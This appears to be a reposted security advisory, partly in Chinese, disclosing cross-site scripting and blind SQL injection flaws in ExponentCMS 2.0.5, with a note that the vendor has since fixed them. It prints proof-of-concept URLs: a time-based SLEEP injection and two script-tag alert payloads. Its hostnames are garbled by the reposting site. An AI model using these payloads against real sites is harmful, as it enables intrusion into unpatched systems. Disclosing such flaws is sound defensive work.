信息 -------------------- 名称 : XSS and Blind SQL Injection Vulnerabilities in ExponentCMS 影像软件 : ExponentCMS 2.0.5 and possibly below. 开发网站: http://HdhCmsTestexponentcms.org 缺陷类型 : Cross-Site Scripting and SQL Injection 安全级别 : Critical Researcher : Onur Yılmaz 描述 -------------------- Exponent is a website content management system (or CMS) that allows site owners to easily create and manage dynamic websites without necessarily directly coding web pages, or managing site navigation. 日记 -------------------- Exponent CMS 2.0.5版有xss缺陷 Example PoC urls are as follows : http://HdhCmsTest2cto测试数据 /index.php?section=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A) http://example测试数据/index.php?action=showall_by_tags&tag=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E&controller=news&src= () random4e5433b85bb1f http://example测试数据/index.php?controller=expTag&action=show&title=changes&src=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E You can read the full article about Cross-Site Scripting and SQL Injection vulnerabilities from here : http://HdhCmsTestmavitunasecurity测试数据/crosssite-scripting-xss/ http://HdhCmsTestmavitunasecurity测试数据/sql-injection/ 解决方案 -------------------- 开发者已经在新版里修复了这些问题
查看更多关于ExponentCMS 2.0.5多个缺陷及修复 - 网站安全 - 自学的详细内容...